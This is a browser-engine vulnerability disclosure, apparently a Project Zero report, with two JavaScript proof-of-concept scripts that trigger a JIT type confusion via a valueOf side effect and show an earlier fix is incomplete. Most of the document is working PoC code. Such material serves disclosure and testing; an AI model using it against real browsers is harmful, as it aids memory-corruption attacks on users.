<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1290
|
|
|
|
I think the fix for #1045 is incorrect.
|
|
|
|
Here's the original PoC.
|
|
|
|
'use strict';
|
|
|
|
function func(a, b, c) {
|
|
a[0] = 1.2;
|
|
b[0] = c;
|
|
a[1] = 2.2;
|
|
a[0] = 2.3023e-320;
|
|
}
|
|
|
|
function main() {
|
|
var a = [1.1, 2.2];
|
|
var b = new Uint32Array(100);
|
|
|
|
// force to optimize
|
|
for (var i = 0; i < 0x10000; i++)
|
|
func(a, b, i);
|
|
|
|
func(a, b, {valueOf: () => {
|
|
a[0] = {};
|
|
|
|
return 0;
|
|
}});
|
|
|
|
a[0].toString();
|
|
}
|
|
|
|
main();
|
|
|
|
|
|
I just changed "var b = new Uint32Array(100);" to "var b = new Uint32Array(0);", and it worked well.
|
|
|
|
PoC:
|
|
-->
|
|
|
|
// Strict mode for the whole script; the PoC below relies on the engine's
// optimizing compiler, not on any sloppy-mode behaviour.
'use strict';
|
|
|
|
// Hot function the PoC gets the JIT to optimize (see the warm-up loop in main).
// The statement order is the whole point of the report: do not reorder or
// simplify it when reading this as a regression test.
function func(a, b, c) {
  a[0] = 1.2; // store a double into `a`, which main() creates holding only doubles
  // Storing into a typed array converts `c` with ToNumber first, so an object
  // `c` has its valueOf() invoked here, with whatever side effects it has.
  // main() passes a `b` of length 0, so the write itself is out of bounds and
  // dropped by the engine, but the conversion (and its side effects) still runs.
  b[0] = c;
  a[1] = 2.2;
  // A tiny denormal double, i.e. a raw 64-bit pattern rather than a meaningful
  // value. The report's claim (hedged, see main): if the optimized code still
  // treats `a` as an unboxed-double array after valueOf() changed its contents,
  // these raw bits are written where a tagged value is expected.
  a[0] = 2.3023e-320;
}
|
|
|
|
// Drives the PoC: warm func() up with benign arguments, then call it once with
// an argument whose valueOf() mutates `a` mid-function.
function main() {
  var a = [1.1, 2.2]; // array holding only doubles
  var b = new Uint32Array(0); // <<--------- 100 -> 0
  // With length 0 the `b[0] = c` store inside func() is out of bounds. The
  // report's point is that the fix for #1045 apparently covers the in-bounds
  // store but not this case — TODO confirm against the #1045 fix.

  // force to optimize
  // Warm up with a plain number for `c`, so the JIT compiles func() with the
  // assumptions seen so far (a holds doubles, c needs no valueOf() call).
  for (var i = 0; i < 0x10000; i++)
    func(a, b, i);

  // Now pass an object: its valueOf() runs in the middle of func() (at the
  // typed-array store) and replaces a[0] with an object, so `a` no longer
  // holds only doubles when func() performs its final `a[0] = 2.3023e-320`.
  func(a, b, {valueOf: () => {
    a[0] = {};

    return 0;
  }});

  // On an engine that accounts for the side effect, a[0] is simply the number
  // 2.3023e-320 here and this call returns its string form; the script exits
  // cleanly. On an affected engine this read is presumably where the type
  // confusion becomes visible (a crash), which is what the report relies on.
  a[0].toString();
}
|
|
|
|
main(); // run the PoC; a fixed engine completes without a crash